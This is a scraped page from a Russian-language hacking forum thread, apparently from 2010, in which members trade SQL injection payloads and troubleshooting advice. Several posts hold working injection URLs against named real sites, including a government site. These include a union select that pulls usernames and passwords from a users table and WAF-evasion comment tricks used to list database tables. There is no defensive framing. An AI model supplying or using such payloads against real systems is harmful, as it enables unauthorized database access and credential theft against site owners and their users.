ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1163 из 1393 « Первая < 163663106311131153 1159 1160 1161 1162 1163 1164 1165 1166 1167 117312131263 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #11621  
Старый 18.02.2010, 01:58
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию
Цитата:
Сообщение от [Feldmarschall]  
что делать есле information_schema идет но выдает ошибку есле добовляю "limit+... иле group_concat?
есть способы обхода этой ошибки иле можно заменить limit както?
мб потому что это mssql?)
Цитата:
Сообщение от ~EviL~  
P.S. Я статьи все уже давно наизусть знаю, просто давно не было MSSQL-INJ поэтому решил спросить.
мб потому что это access?)
www.mlsp.government.bg/EIF/forum/reply.asp?id=-4+union+select+1,1,1,1,1,1,1,1,1,username%2b'<=>'% 2bpassword,1,1,1,1,1+from+users
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием

  #11622  
Старый 18.02.2010, 02:20
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию
l1ght да DB Server:MSSQL

ну вот так

Цитата:
-1'+union+select+1,2,3,4,5,table_name,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21+from+information_sche ma.tables+--+
через where+table_name+... (not in '....') както не идет
Последний раз редактировалось [Feldmarschall]; 18.02.2010 в 04:50..
 
Ответить с цитированием

  #11623  
Старый 18.02.2010, 07:14
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию
Цитата:
Сообщение от RulleR  
WAF не дремлет...
Код:
http://www.aspik.am/index.php?p=-5+union+/*!select*/+concat_ws(0x3a,version(),database(),user())
izvini a dalse kak budet ??

http://www.aspik.am/index.php?p=-5+union+/*!select*/+concat(table_name)*/+from*/+information_schema.tables*/

ili kak ??
a mojet podrobnee voobse eto kakoy metod ??
 
Ответить с цитированием

  #11624  
Старый 18.02.2010, 11:05
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
LokbatanLi
Например так
http://www.aspik.am/index.php?p=-5+union+/*!select*/+/*!table_name*/+from+information_schema.tables+limit+19,1
 
Ответить с цитированием

  #11625  
Старый 18.02.2010, 16:58
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
А есть какая-нибудь функция типа NAME_CONST??? В скрипте два запроса. Версия 5. NAME_CONST не работает
 
Ответить с цитированием

  #11626  
Старый 18.02.2010, 20:36
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию
Цитата:
Сообщение от jokester  
LokbatanLi
Например так
http://www.aspik.am/index.php?p=-5+union+/*!select*/+/*!table_name*/+from+information_schema.tables+limit+19,1
извини Jokester

а ето какоы метод или есть статя об етому ??
 
Ответить с цитированием

  #11627  
Старый 18.02.2010, 20:53
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию
При попытки произвести SQl inj выводится ошибка,
но "order by 12" съела, а union+select выдаёт ошибку
Куда копать, если выдаёт такую ошибку ?
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1,2,3,4,5,6,7,8,9,10,11,12-- order by foto_foto.d_dobavl desc limit 1' at line 1
Последний раз редактировалось SeNaP; 18.02.2010 в 20:56..
 
Ответить с цитированием

  #11628  
Старый 18.02.2010, 21:20
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию
Цитата:
Сообщение от SeNaP  
При попытки произвести SQl inj выводится ошибка,
но "order by 12" съела, а union+select выдаёт ошибку
Куда копать, если выдаёт такую ошибку ?
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1,2,3,4,5,6,7,8,9,10,11,12-- order by foto_foto.d_dobavl desc limit 1' at line 1
попробуй так
Цитата:
1,2,3,4,5,6,7,8,9,10,11,12+limit+1,1--
1,2,3,4,5,6,7,8,9,10,11,12+information_schema.tabl es--
 
Ответить с цитированием

  #11629  
Старый 18.02.2010, 21:24
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию
Цитата:
Сообщение от [Feldmarschall]  
попробуй так
не помогло
 
Ответить с цитированием

  #11630  
Старый 18.02.2010, 21:36
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию
SeNaP,

давай линк, ибо это гадание на кофейной гуще....
 
Ответить с цитированием
Ответ
Страница 1163 из 1393 « Первая < 163663106311131153 1159 1160 1161 1162 1163 1164 1165 1166 1167 117312131263 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ